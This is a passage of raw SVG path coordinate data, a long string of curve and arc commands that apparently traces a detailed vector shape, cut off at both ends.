5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5